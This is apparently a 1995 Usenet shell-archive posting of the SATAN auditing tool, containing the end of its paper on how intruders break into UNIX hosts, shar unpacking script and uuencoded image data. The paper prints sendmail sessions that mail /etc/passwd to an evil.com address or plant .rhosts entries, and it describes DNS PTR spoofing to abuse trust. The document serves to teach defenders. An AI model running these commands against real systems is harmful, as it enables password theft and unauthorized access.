X bin: "| cat /etc/passwd | mail z...@evil.com"
X evil % newaliases -oQ/tmp -oA`pwd`/decode
X evil % uuencode decode.pag /etc/aliases.pag | mail dec...@victom.com
X evil % /usr/lib/sendmail -fbin -om -oi b...@victim.com < /dev/null
X
XA lot of things can be found out by just asking sendmail if an address
Xis acceptable (vrfy), or what an address expands to (expn). When the
Xfinger or rusers services are turned off, vrfy and expn can still be
Xused to identify user accounts or targets. Vrfy and expn can also be
Xused to find out if the user is piping mail through any program that
Xmight be exploited (e.g. vacation, mail sorters, etc.). It can be a
Xgood idea to disable the vrfy and expn commands: in most versions, look
Xat the source file srvrsmtp.c, and either delete or change the two lines
Xin the CmdTab structure that have the strings "vrfy" and "expn". Sites
Xwithout source can still disable expn and vrfy by just editing the
Xsendmail executable with a binary editor and replacing "vrfy" and "expn"
Xwith blanks. Acquiring a recent version of sendmail (see Appendix D) is
Xalso an extremely good idea, since there have probably been more
Xsecurity bugs reported in sendmail than in any other UNIX program.
X
X----
X
XAs a sendmail-sendoff, there are two fairly well known bugs that should
Xbe checked into. The first was definitely fixed in version 5.59 from
XBerkeley; despite the messages below, for versions of sendmail previous
Xto 5.59, the "evil.com" gets appended, despite the error messages, along
Xwith all of the typical mail headers, to the file specified:
X
X % cat evil_sendmail
X telnet victim.com 25 << EOSM
X rcpt to: /home/zen/.rhosts
X mail from: zen
X data
X random garbage
X .
X rcpt to: /home/zen/.rhosts
X mail from: zen
X data
X evil.com
X .
X quit
X EOSM
X
X evil % /bin/sh evil_sendmail
X Trying 128.128.128.1
X Connected to victim.com
X Escape character is '^]'.
X Connection closed by foreign host.
X
X evil % rlogin victim.com -l zen
X Welcome to victim.com!
X victim %
X
XThe second hole, fixed only recently, permitted anyone to specify
Xarbitrary shell commands and/or pathnames for the sender and/or
Xdestination address. Attempts to keep details secret were in vain, and
Xextensive discussions in mailing lists and usenet news groups led to
Xdisclosure of how to exploit some versions of the bug. As with many
XUNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
Xsince they all share a common source code tree ancestry. Space
Xprecludes us from discussing it fully, but a typical attack to get the
Xpassword file might look like this:
X
X evil % telnet victim.com 25
X Trying 128.128.128.1...
X Connected to victim.com
X Escape character is '^]'.
X 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
X mail from: "|/bin/mail z...@evil.com < /etc/passwd"
X 250 "|/bin/mail z...@evil.com < /etc/passwd"... Sender ok
X rcpt to: nosuchuser
X 550 nosuchuser... User unknown
X data
X 354 Enter mail, end with "." on a line by itself
X .
X 250 Mail accepted
X quit
X Connection closed by foreign host.
X evil %
X
XAt the time of writing, version 8.6.10 of sendmail (see Appendix D for
Xinformation on how to get this) is reportedly the only variant of
Xsendmail with all of the recent security bugs fixed.
X
XTrust
X-----
X
XFor our final topic of vulnerability, we'll digress from the practical
Xstrategy we've followed previously to go a bit more into the theoretical
Xside, and briefly discuss the notion of trust. The issues and
Ximplications of vulnerabilities here are a bit more subtle and
Xfar-reaching than what we've covered before; in the context of this
Xpaper we use the word trust whenever there is a situation when a server
X(note that any host that allows remote access can be called a server)
Xcan permit a local resource to be used by a client without password
Xauthentication when password authentication is normally required. In
Xother words, we arbitrarily limit the discussion to clients in disguise.
X
XThere are many ways that a host can trust: .rhosts and hosts.equiv files
Xthat allow access without password verification; window servers that
Xallow remote systems to use and abuse privileges; export files that
Xcontrol access via NFS, and more.
X
XNearly all of these rely on client IP address to hostname conversion to
Xdetermine whether or not service is to be granted. The simplest method
Xuses the /etc/hosts file for a direct lookup. However, today most hosts
Xuse either DNS (the Domain Name Service), NIS, or both for name lookup
Xservice. A reverse lookup occurs when a server has an IP address (from
Xa client host connecting to it) and wishes to get the corresponding
Xclient hostname.
X
XAlthough the concept of how host trust works is well understood by most
Xsystem administrators, the _dangers_ of trust, and the _practical_
Xproblem it represents, irrespective of hostname impersonation, is one of
Xthe least understood problems we know of on the Internet. This goes far
Xbeyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
Xsystems -- indeed, much of the useful services in UNIX are based on the
Xconcept that well known (to an administrator or user) sites are trusted
Xin some way. What is not understood is how networking so tightly binds
Xsecurity between what are normally considered disjoint hosts.
X
XAny form of trust can be spoofed, fooled, or subverted, especially when
Xthe authority that gets queried to check the credentials of the client
Xis either outside of the server's administrative domain, or when the
Xtrust mechanism is based on something that has a weak form of
Xauthentication; both are usually the case.
X
XObviously, if the host containing the database (either NIS, DNS, or
Xwhatever) has been compromised, the intruder can convince the target
Xhost that s/he is coming from any trusted host; it is now sufficient to
Xfind out which hosts are trusted by the target. This task is often
Xgreatly helped by examining where system administrators and system
Xaccounts (such as root, etc.) last logged in from. Going back to our
Xtarget, victim.com, you note that root and some other system accounts
Xlogged in from big.victim.com. You change the PTR record for evil.com so
Xthat when you attempt to rlogin in from evil.com to victim.com,
Xvictim.com will attempt to look up your hostname and will find what you
Xplaced in the record. If the record in the DNS database looks like:
X
X 1.192.192.192.in-addr.arpa IN PTR evil.com
X
XAnd you change it to:
X
X 1.192.192.192.in-addr.arpa IN PTR big.victim.com
X
Xthen, depending on how naive victim.com's system software is, victim.com
Xwill believe the login comes from big.victim.com, and, assuming that
Xbig.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
Xable to login without supplying a password. With NIS, it is a simple
Xmatter of either editing the host database on the NIS master (if this is
Xcontrolled by the intruder) or of spoofing or forcing NIS (see
Xdiscussion on NIS security above) to supply the target with whatever
Xinformation you desire. Although more complex, interesting, and
Xdamaging attacks can be mounted via DNS, time and space don't allow
Xcoverage of these methods here.
X
XTwo methods can be used to prevent such attacks. The first is the most
Xdirect, but perhaps the most impractical. If your site doesn't use any
Xtrust, you won't be as vulnerable to host spoofing. The other strategy
Xis to use cryptographic protocols. Using the secure RPC protocol (used
Xin secure NFS, NIS+, etc.) is one method; although it has been "broken"
Xcryptographically, it still provides better assurance than RPC
Xauthentication schemes that do not use any form of encryption. Other
Xsolutions, both hardware (smartcards) and software (Kerberos), are being
Xdeveloped, but they are either incomplete or require changes to system
Xsoftware.
X
XAppendix B details the results of an informal survey taken from a
Xvariety of hosts on the Internet.
X
XProtecting the system
X---------------------
X
XIt is our hope that we have demonstrated that even some of the most
Xseemingly innocuous services run can offer (sometimes unexpectedly)
Xammunition to determined system crackers. But, of course, if security
Xwere all that mattered, computers would never be turned on, let alone
Xhooked into a network with literally millions of potential intruders.
XRather than reiterating specific advice on what to switch on or off, we
Xinstead offer some general suggestions:
X
Xo If you cannot turn off the finger service, consider installing a
Xmodified finger daemon. It is rarely necessary to reveal a user's home
Xdirectory and the source of last login.
X
Xo Don't run NIS unless it's absolutely necessary. Use NFS as little
Xas possible.
X
Xo Never export NFS filesystems unrestricted to the world. Try to
Xexport file systems read-only where possible.
X
Xo Fortify and protect servers (e.g. hosts that provide a service to
Xother hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
Xaccounts on these hosts.
X
Xo Examine carefully services offered by inetd and the portmapper.
XEliminate any that aren't explicitly needed. Use Wietse Venema's inetd
Xwrappers, if for no other reason than to log the sources of connections
Xto your host. This adds immeasurably to the standard UNIX auditing
Xfeatures, especially with respect to network attacks. If possible, use
Xthe loghost mechanism of syslog to collect security-related information
Xon a secure host.
X
Xo Eliminate trust unless there is an absolute need for it. Trust is
Xyour enemy.
X
Xo Use shadow passwords and a passwd command that disallows poor
Xpasswords. Disable or delete unused/dormant system or user accounts.
X
Xo Keep abreast of current literature (see our suggested reading list and
Xbibliography at the end of this paper) and security tools; communicate
Xto others about security problems and incidents. At minimum, subscribe
Xto the CERT mailing list and phrack magazine (plus the firewalls mailing
Xlist, if your site is using or thinking about installing a firewall) and
Xread the usenet security newsgroups to get the latest information on
Xsecurity problems. Ignorance is the deadliest security problem we are
Xaware of.
X
Xo Install all vendor security patches as soon as possible, on all of
Xyour hosts. Examine security patch information for other vendors - many
Xbugs (rdist, sendmail) are common to many UNIX variants.
X
XIt is interesting to note that common solutions to security problems
Xsuch as running Kerberos or using one-time passwords or digital tokens
Xare ineffective against most of the attacks we discuss here. We
Xheartily recommend the use of such systems, but be aware that they are
X_not_ a total security solution -- they are part of a larger struggle to
Xdefend your system.
X
XConclusions
X-----------
X
XPerhaps none of the methods shown here are surprising; when writing this
Xpaper, we didn't learn very much about how to break into systems. What
Xwe _did_ learn was, while testing these methods out on our own systems
Xand that of friendly sites, just how effective this set of methods is
Xfor gaining access to a typical (UNIX) Internet host. Tiring of trying
Xto type these in all by hand, and desiring to keep our own systems more
Xsecure, we decided to implement a security tool (SATAN) that attempts to
Xcheck remote hosts for at least some of the problems discussed here.
XThe typical response, when telling people about our paper and our tool
Xwas something on the order of "that sounds pretty dangerous -- I hope
Xyou're not going to give it out to everybody. But you since you can
Xtrust me, may I have a copy of it?"
X
XWe never set out to create a cookbook or toolkit of methods and programs
Xon how to break into systems -- instead, we saw that these same methods
Xwere being used, every day, against ourselves and against friendly
Xsystem administrators. We believe that by propagating information that
Xnormally wasn't available to those outside of the underworld, we can
Xincrease security by raising awareness. Trying to restrict access to
X"dangerous" security information has never seemed to be a very effective
Xmethod for increasing security; indeed, the opposite appears to be the
Xcase, since the system crackers have shown little reticence to share
Xtheir information with each other.
X
XWhile it is almost certain that some of the information presented here
Xis new material to (aspiring) system crackers, and that some will use it
Xto gain unauthorized entrance onto hosts, the evidence presented even by
Xour ad hoc tests shows that there is a much larger number of insecure
Xsites, simply because the system administrators don't know any better --
Xthey aren't stupid or slow, they simply are unable to spend the very
Xlittle free time that they have to explore all of the security issues
Xthat pertain to their systems. Combine that with no easy access to this
Xsort of information and you have poorly defended systems. We (modestly)
Xhope that this paper will provide badly-needed data on how systems are
Xbroken into, and further, to explain _why_ certain steps should be taken
Xto secure a system. Knowing why something is a problem is, in our
Xopinion, the real key to learning and to making an informed, intelligent
Xchoice as to what security really means for your site.
X
X----
X
XAppendix A:
X
XSATAN (Security Analysis Tool for Auditing Networks)
X
XOriginally conceived some years ago, SATAN is actually the prototype of
Xa much larger and more comprehensive vision of a security tool. In its
Xcurrent incarnation, SATAN remotely probes and reports various bugs and
Xweaknesses in network services and windowing systems, as well as
Xdetailing as much generally useful information as possible about the
Xtarget(s). It then processes the data with a crude filter and what
Xmight be termed an expert system to generate the final security
Xanalysis. While not particularly fast, it is extremely modular and easy
Xto modify.
X
XSATAN consists of several sub-programs, each of which is an executable
Xfile (perl, shell, compiled C binary, whatever) that tests a host for a
Xgiven potential weakness. Adding further test programs is as simple as
Xputting an executable into the main directory with the extension ".satan";
Xthe driver program will automatically execute it. The driver generates
Xa set of targets (using DNS and a fast version of ping together to get
X"live" targets), and then executes each of the programs over each of the
Xtargets. A data filtering/interpreting program then analyzes the
Xoutput, and lastly a reporting program digests everything into a more
Xreadable format.
X
XThe entire package, including source code and documentation, has been
Xmade freely available to the public, via anonymous ftp and by posting it
Xto one of the numerous source code groups on the Usenet.
X
X----
X
XAppendix B:
X
XAn informal survey conducted on about a dozen Internet sites
X(educational, military, and commercial, with over 200 hosts and 40000
Xaccounts) revealed that on the average, close to 10 percent of a site's
Xaccounts had .rhosts files. These files averaged six trusted hosts
Xeach; however, it was not uncommon to have well over one hundred entries
Xin an account's .rhosts file, and on a few occasions, the number was
Xover five hundred! (This is not a record one should be proud of
Xowning.) In addition, _every_ site directly on the internet (one site
Xwas mostly behind a firewall) trusted a user or host at another site --
Xthus, the security of the site was not under the system administrators
Xdirect control. The larger sites, with more users and hosts, had a
Xlower percentage of users with .rhosts files, but the size of .rhosts
Xfiles increased, as well as the number of trusted off-site hosts.
X
XAlthough it was very difficult to verify how many of the entries were
Xvalid, with such hostnames such as "Makefile", "Message-Id:", and
X"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
Xquestion the wisdom of putting a site's security in the hands of its
Xusers. Many users (especially the ones with larger .rhosts files)
Xattempted to put shell-style comments in their .rhosts files, which most
XUNIX systems attempt to resolve as valid host names. Unfortunately, an
Xattacker can then use the DNS and NIS hostname spoofing techniques
Xdiscussed earlier to set their hostname to "#" and freely log in. This
Xputs a great many sites at risk (at least one major vendor ships their
Xsystems with comments in their /etc/hosts.equiv files.)
X
XYou might think that these sites were not typical, and, as a matter of
Xfact, they weren't. Virtually all of the administrators knew a great
Xdeal about security and write security programs for a hobby or
Xprofession, and many of the sites that they worked for did either
Xsecurity research or created security products. We can only guess at
Xwhat a "typical" site might look like.
X
X----
X
XAppendix C:
X
XAfter receiving mail from a site that had been broken into from one of
Xour systems, an investigation was started. In time, we found that the
Xintruder was working from a list of ".com" (commercial) sites, looking
Xfor hosts with easy-to steal password files. In this case,
X"easy-to-steal" referred to sites with a guessable NIS domainname and an
Xaccessible NIS server. Not knowing how far the intruder had gotten, it
Xlooked like a good idea to warn the sites that were in fact vulnerable
Xto password file theft. Of the 656 hosts in the intruder's hit list, 24
Xhad easy-to-steal password files -- about one in twenty-five hosts! One
Xthird of these files contained at least one password-less account with
Xan interactive shell. With a grand total of 1594 password-file entries,
Xa ten-minute run of a publically-available password cracker (Crack)
Xrevealed more than 50 passwords, using nothing but a low-end Sun
Xworkstation. Another 40 passwords were found within the next 20
Xminutes; and a root password was found in just over an hour. The result
Xafter a few days of cracking: five root passwords found, 19 out of 24
Xpassword files (eighty percent) with at least one known password, and
X259 of 1594 (one in six) passwords guessed.
X
X----
X
XAppendix D:
X
XHow to get some free security resources on the Internet
X
XMailing lists:
X
Xo The CERT (Computer Emergency Response Team) advisory mailing list.
XSend e-mail to ce...@cert.org, and ask to be placed on their mailing
Xlist.
X
Xo The Phrack newsletter. Send an e-mail message to
Xph...@well.sf.ca.us and ask to be added to the list.
X
Xo The Firewalls mailing list. Send the following line to
Xmajo...@greatcircle.com:
X
X subscribe firewalls
X
Xo Computer Underground Digest. Send e-mail to
Xtk0...@mvs.cso.niu.edu, asking to be placed on the list.
X
XFree Software:
X
XCOPS (Computer Oracle and Password System) is available via anonymous
Xftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
X
XThe tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
Xin pub/security.
X
XCrack is available from ftp.uu.net, in /usenet/comp.sources.misc/volume28.
X
XTAMU is a UNIX auditing tool that is part of a larger suite of excellent
Xtools put out by a group at the Texas A&M University. They can be
Xgotten via anonymous ftp at net.tamu.edu, in pub/security/TAMU.
X
XSources for ftpd and many other network utilities can be found in
Xftp.uu.net, in packages/bsd-sources.
X
XSource for ISS (Internet Security Scanner), a tool that remotely scans
Xfor various network vulnerabilities, is available via anonymous ftp from
Xftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
X
XSecurelib is available via anonymous ftp from ftp.uu.net, in
Xusenet/comp.sources.misc/volume36/securelib.
X
XThe latest version of berkeley sendmail is available via anonymous ftp
Xfrom ftp.cs.berkeley.edu, in ucb/sendmail.
X
XTripwire, a UNIX filesystem integrity checker+, is available via anonymous
Xftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire.
X
X----
X
XBibliography:
X
XBaldwin, Robert W., Rule Based Analysis of Computer Security,
XMassachusetts Institute of Technology, June 1987.
X
XBellovin, Steve, Using the Domain Name System for System Break-ins,
X1992 (unpublished).
X
XMassachusetts Institute of Technology, X Window System Protocol,
XVersion 11, 1990.
X
XShimomura, Tsutomu, private communication.
X
XSun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
X
X----
X
XSuggested reading:
X
XBellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
XComputer Communication Review 19 (2), 1989; a comment by Stephen
XKent appears in volume 19 (3), 1989.
X
XGarfinkel, Simson and Spafford, Gene, "Practical UNIX Security",
XO'Reilly and Associates, Inc., 1992.
X
XHess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
XStudy: Network Information Service", Computer Communication Review
X22 (5) 1992.
X
XPhreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
XFour, Issue Forty-Three, File 14 of 27.
X
XRanum, Marcus, "Firewalls" internet electronic mailing list, Sept
X1993.
X
XSchuba, Christoph, "Addressing Weaknesses in the Domain Name System
XProtocal", Purdue University, August 1993.
X
XThompson, Ken, Reflections on Trusting Trust, Communications of the ACM
X27 (8), 1984.
X</pre>
X</BODY>
X</HTML>
END_OF_FILE
if test 52520 -ne `wc -c <'satan-1.1.1/html/docs/admin_guide_to_cracking.html'`; then
echo shar: \"'satan-1.1.1/html/docs/admin_guide_to_cracking.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/admin_guide_to_cracking.html'
fi
if test ! -d 'satan-1.1.1/html/reporting' ; then
echo shar: Creating directory \"'satan-1.1.1/html/reporting'\"
mkdir 'satan-1.1.1/html/reporting'
fi
if test ! -d 'satan-1.1.1/html/running' ; then
echo shar: Creating directory \"'satan-1.1.1/html/running'\"
mkdir 'satan-1.1.1/html/running'
fi
if test ! -d 'satan-1.1.1/html/tutorials' ; then
echo shar: Creating directory \"'satan-1.1.1/html/tutorials'\"
mkdir 'satan-1.1.1/html/tutorials'
fi
if test ! -d 'satan-1.1.1/html/tutorials/first_time' ; then
echo shar: Creating directory \"'satan-1.1.1/html/tutorials/first_time'\"
mkdir 'satan-1.1.1/html/tutorials/first_time'
fi
if test ! -d 'satan-1.1.1/html/tutorials/vulnerability' ; then
echo shar: Creating directory \"'satan-1.1.1/html/tutorials/vulnerability'\"
mkdir 'satan-1.1.1/html/tutorials/vulnerability'
fi
if test ! -d 'satan-1.1.1/include' ; then
echo shar: Creating directory \"'satan-1.1.1/include'\"
mkdir 'satan-1.1.1/include'
fi
if test ! -d 'satan-1.1.1/include/netinet' ; then
echo shar: Creating directory \"'satan-1.1.1/include/netinet'\"
mkdir 'satan-1.1.1/include/netinet'
fi
if test ! -d 'satan-1.1.1/perl' ; then
echo shar: Creating directory \"'satan-1.1.1/perl'\"
mkdir 'satan-1.1.1/perl'
fi
if test ! -d 'satan-1.1.1/perllib' ; then
echo shar: Creating directory \"'satan-1.1.1/perllib'\"
mkdir 'satan-1.1.1/perllib'
fi
if test ! -d 'satan-1.1.1/rules' ; then
echo shar: Creating directory \"'satan-1.1.1/rules'\"
mkdir 'satan-1.1.1/rules'
fi
if test ! -d 'satan-1.1.1/src' ; then
echo shar: Creating directory \"'satan-1.1.1/src'\"
mkdir 'satan-1.1.1/src'
fi
if test ! -d 'satan-1.1.1/src/boot' ; then
echo shar: Creating directory \"'satan-1.1.1/src/boot'\"
mkdir 'satan-1.1.1/src/boot'
fi
if test ! -d 'satan-1.1.1/src/fping' ; then
echo shar: Creating directory \"'satan-1.1.1/src/fping'\"
mkdir 'satan-1.1.1/src/fping'
fi
if test ! -d 'satan-1.1.1/src/misc' ; then
echo shar: Creating directory \"'satan-1.1.1/src/misc'\"
mkdir 'satan-1.1.1/src/misc'
fi
if test ! -d 'satan-1.1.1/src/nfs-chk' ; then
echo shar: Creating directory \"'satan-1.1.1/src/nfs-chk'\"
mkdir 'satan-1.1.1/src/nfs-chk'
fi
if test ! -d 'satan-1.1.1/src/port_scan' ; then
echo shar: Creating directory \"'satan-1.1.1/src/port_scan'\"
mkdir 'satan-1.1.1/src/port_scan'
fi
if test ! -d 'satan-1.1.1/src/rpcgen' ; then
echo shar: Creating directory \"'satan-1.1.1/src/rpcgen'\"
mkdir 'satan-1.1.1/src/rpcgen'
fi
if test ! -d 'satan-1.1.1/src/yp-chk' ; then
echo shar: Creating directory \"'satan-1.1.1/src/yp-chk'\"
mkdir 'satan-1.1.1/src/yp-chk'
fi
echo shar: End of archive 1 $of 15$.
cp /dev/null ark1isdone
MISSING=""
for I in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ; do
if test ! -f ark${I}isdone ; then
MISSING="${MISSING} ${I}"
fi
done
if test "${MISSING}" = "" ; then
echo You have unpacked all 15 archives.
rm -f ark[1-9]isdone ark[1-9][0-9]isdone
else
echo You still must unpack the following archives:
echo " " ${MISSING}
fi
exit 0
exit 0 # Just in case...

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 126
Archive-name: satan/part02

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/images.tar.UU satan-1.1.1/perllib/README
# satan-1.1.1/src/fping/fping.c
# Wrapped by kent@ftp on Wed Apr 12 20:30:08 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 2 (of 15)."'
if test -f 'satan-1.1.1/images.tar.UU' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/images.tar.UU'\"
else
echo shar: Extracting \"'satan-1.1.1/images.tar.UU'\" $33901 characters$
sed "s/^X//" >'satan-1.1.1/images.tar.UU' <<'END_OF_FILE'
Xbegin 664 satan-1.1.1/images.tar
XM<V%T86XM,2XQ+C$O:'1M;"]I;6%G97,O
XM
XM " @(#<W-2 (" @-#8U( @(" U,#8@ " @(" @(" @(" P
XM(" U-S0R-3(Q-30Q(" Q,# S- @
XM
XM
XM
XM
XM
XM
XM
XM !S871A;BTQ+C$N,2]H=&UL+VEM86=E<R]S871A
XM;BYG:68
XM (" @-C P( @(" T-C4@ " @
XM(#4P-B (" @(" @(#(W,3,@(#4W,S$S-S,S-C$@(#$Q-S$R "
XM
XM
XM
XM
XM
XM
XM
XM $=)1C@Y87@ D0#P
XM #___\A^00! ! "P > "1 "_HR/J<OM#R,$0-J+L\9T^P^&
XM2R>&58E.J7BNKD&^\JS%--W>BJWW/IS["7'!8>I4G/&,QZ22>:,X&<O)%(J2
XM!BK7[;;5K6)=4F[8(EYU2]-.V;Q;?W]I=JQ\>+NUP,<]PK<12':G]V7V=CB8
XME[28E\6S5(> 9!.8J&=(2>7HI689Q$49JHAHB)D(1"+9^2BC)>G9UY>I:5H+
XMAE<JMR;G4"0JJQJ*6UB\EWE1-\D!HSA:"5T\?)S*(<8LX3;GE8K,AY<L#AM>
XML]BJ[$E>GG-;O6JMNZL\B'X].A\\W/VM.9]O2ANX;!]R8:(F*MBQ7;6XR4NP
XM3A693<Y0.6/X;F%&_E:HG/AJP%'7*7?Q1"*3>(@:1%R<3!C<.,?;I5,(U[6+
XMXP\?FXL,4=*<6:DARY0\:XZX:4(:K&>E'!JL^8YINV30="9E1#4JQHY"A?*S
XMAG)6EIA966[L!^^D4ZJ,JG[":NNLW+2(9 T]]S$#VI'A]GX#Z!?NR#A1M@XT
XM&?@OW7Z&\?H@*6_N4[+3; 9<22>CT<9\Q_E]R$T(Y&TP@TJV#-H>CL9002W^
XM_-J?ZL?3.#?MZKDV:":CD;0V>RME;)EY7_A>2*LOZ\&<ZU(T0C(Y&*.FJREM
XMNK;X77JPC;'%BE&=]9SIFFOT+E+BZ=-%Q[2%]^\X:O3KG7L8"DAE0-)3_FVR
XM_@U4:"#T-I=Y1(WSCV$5$;;);I_DIM%1AW4&'&GA"6-<??X!.%Q<UKFR6D_F
XM$9B35@KNL!IR&F;%CW@/X2<:A*5]:%>)@8G5PXKC]67+;1_N]E%>=TF673T-
XM2?5;>TJ"I&.37'5WD&R.88B0"C-J**)2M8U8X'U$:F99D5OUY" A3H*7Y9%(
XMBO53<7KIUEU1'>+&7RY9ONEE9=7AQB&+F@DHT#6(G2>75$ZJZ0=!OQS**%#]
XM;8GF<V]Z:-N@6$;ZE9B 6L5=HSIBI^*CB5I1IZ?K;8:=4[.0!^*B.\)8WZJ?
XMJ:3>; P"L@>7H+3UE7*4/0IGF:/B:E&A)L5W_A: ^]AZ%+&-PM4G<+_.1-0]
XMG!3*86O+[2D<9)0)0E^R) Y&Z)]1">NJ6;W"FMZYIBK&+(K1(EIKG'OJ@U::
XMP,;+*7L-F@NC=-OM ZVB%P55T7S;:-FEA.I^*R"]Z<YYI$<RICHOMYPF.*FX
XM\L%!SG^ZZO<BL *M<O"*NJ+$X]U;LSORBY_*EB%7>8:\[7OTLDSMMU>5@/#
XM'I[:'%0 $7Q@KN#N?.I>3!%,'+-MX)2DJ7VR^>JF+$#)Z'*A>;,N>FI,ZVG-
XM,T/*(]5+-RG=,_?Z&_"4G:;FLU9=2WQ.AC+S13:6R(6EQ+@V[QTLJRNY24_&
XMX)6=KR\YHR$XTQ2"_D7J*^,2;NR?Q!I'LN:?-FQ%X.RQ/6258TC^:F55&6SF
XMDV?K";&X.K%^Q-X91QXWCJ?'BGN$AKLG]&N"80[H=\ ?KAQ;?!*)/.VBLZW@
XMWTP^_F#O*]OF+.)VA/2V<^XJ' :ZK;<A)7_;@OR[SMIW/''Z^$QNO+-1S&8B
XM=S[F3#DD01+=*H-*"[H^5P'P=14CA=O$-[T JJUC1 -?_B"G0+>8@X"QZE:>
XM(J@U"!X03!Y;'P(%>,';;0A4"[N@]IS7++.-+GDN<1X*(8*YKAR,+"W$DTMB
XM$C:FW6=2;WG$I6"(+R$BA#5*A:OCKA (3:#<Z5BW@@RF#C(/0%]1^N-I\,&
XMI!T,4D$=-=(<E7R#Q2B^@HO-@Q35+*$7^\V/2C!D(Y.J98X30<MR8/P%^P)8
XM/\"-;3I-0-G2 #C%)17D#W]48R#-U#\Q9F^-+]RBI#+D/OU!,7%((4(CTX@I
XM&]IEA[@Z'O4J>;PAV"H:;0PE;ZY0)BV:<H(X4>4J>YA)>;T2"O#)SRRA$\E;
XMNF<@:-#E*2?I2^"5,)C$="4QQWC,8!HSF; T90$ #O< 3^0 4 <N=69T
XM<')C !.P !-G !0 !&9R960 ;64R $_ $^ % &4D5!1'-A=&%N
XM+3$N,2XQ+VAT;6PO:6UA9V5S+W-A;G1A+F=I9@
XM
XM @(" V,# @ " @(#0V-2 (" @-3 V( @(" @(" Q,3<T,2 @-3<S
XM,3,T,S T," @,3$W,C( (
XM
XM
XM
XM
XM
XM
XM
XM 1TE&.#EA>0!P /< " @ ! ("!@ @(
XM @(""$ ! ( ! (" 0$!@( "D ! 0"! 0&! 0$!@0"#D !@0$"$0 "$0
XM"$H %( "$8"!@8(1@8&"$8$"$8&"D8"%H !@A(1@A*2DA$"$A(2$A*2DA
XM&', #$A$"DA(3$A&"$I*80 "$I,3$I&"DI*8P #$I(3DI&"$Q,90 )P
XM $(I&#DQ(3$Q,3$Q.:4 $(Q&*T $(Q(9P("$(Q*3$Y.3$Y0J4("#DY,4(Y
XM*3DY.9P0$$(Y.4HY(4HY*:40$$HY,5(Y*3E"0CE"2D)".4)"0J48&#E*2E)"
XM,5)"*5I",4)*2J4A(4I*4DI*2E)*0JTA(5I*,8PQ,5I*.6-**4)24J4I*6-*
XM.:TI*5)22E)26E)24J4Q,5I22FM2,6M2.5):6FM20K4Q,:4Y.5I:6FM:.6M:
XM0E)C8VM:2G-:.7-:0K4Y.5IC8WM:0GM:2JU"0F-C8U)K:V-C:W-C4KU"0JU*
XM2FMK<VMK:ZU24H1K2F-S<X1K4H1K6HQK4KU24JU:6G-S>W-S<[5:6HQS4FM[
XM>Y1S4IQK:Y1S6GM[<[5C8WM[>Y1[6I1[8[5K:WN$C)1[>X2$A,9K:[5S<YR$
XM8X2,C*6$6J6$8[5[>XR,C(R,E*V$8\YS<X24E*V,:[6$A,Y[>Y24E)24G+6,
XM:[648[64:[V,C,Z$A+64<YR<G)R<I<:,C+V4E+V<<]:,C+6<G,:<>\:<<Z6E
XMI:6EK=:4E*6MK;VEI<ZE>ZVMK=:E>Z6UM;VMK<ZMA-:M>]:MA,:MK;6UO;6U
XMM=ZEI=ZMA*V]O=ZUA-ZUC+V]O;V]QN>UC+7&QN>]C,;&SL/#P^^]C.^]E+W.
XMSN>]O?>]E,;.SN_&E,[.SO?&E/?&G/_&E,[6UO?.G-;6UO_.E-;6WO_.G._.
XMSL[>WO_6G/_6I=[>Y][>WL[GY__>K=[GY_?>WM;O[^?G[^?GY_?GY^?O[^_O
XM[^_O]^?W]__O[^_W]_?W]_?W___W]^_______R'Y! $ -4 + !Y '
XM C^ *L)'$BPH,&#"!,J7,BPH<.'$"-*A(BNG45T$S-JW,@1(<9->(C,F('G
XM%L:.*%.J-(BQC(R1,&?(0.)KI<V;$]'Y^O(RID\95<+A'$J4Y3"7/I/"_%+M
XM9-&G*<.UJ^9'J=68?II"W3I1:C50/'I>'3NCC%:N:!.B"^=+4A6Q8W'(Q7%5
XM!INS:=-.M<3S*@X=,U3H&*P#QP4+A?\2'DQW9!5:>;=B/!4V+N & #)K;J$'
XMP 4/'A 4&#VZQ%RY82(317>J"ERE<DM8 # HC;Y_N'/7*R4,"C,X=?Q101<#
XM@(@%%BZHP#%+J.J4Z&Z))#L#APL$ $J]R\V]NW?<]O[^"6OD!4"!$@6JS6/W
XMG".>UU==#!CTO;[][L+>:;8Q!%C[B3Q0-Y)U%_1RWX$(_I,,&2T X-]_#PD(
XMDV'2)&CA@5< &%#OL#GEPLV7"AB?9G-L^%" 4HXD@7QC.@B=[H H,LX)QZ$
XMSA,JCB3#%B]VQXZ(F3U8XT#H!)*C3#)DTR-W$#QS(0 0#%F0*QZ.]=*2W,4"
XM@"X69D:CE (=B>0K6'('@")MA'>@$P"$ B8Z1A[I@@P7LJ,(;IG,LP]WR0 R
XMR3P @&>?+E>8**4O55IYR(5^=@-,'C8 PYT3_XCPSSA#_ - -_5IF0J8*<K9
XMW3A[UF>#!GED,@0 5_PSSSW^-F3R#P"X0?!/'@#4)\(![-6(CB5BOD1'=P D
XM\UTLP #0RQ5C@ # #F908$(DR.0APC^QM/$/! !\5PT H?1:HYA(GL,=, #,
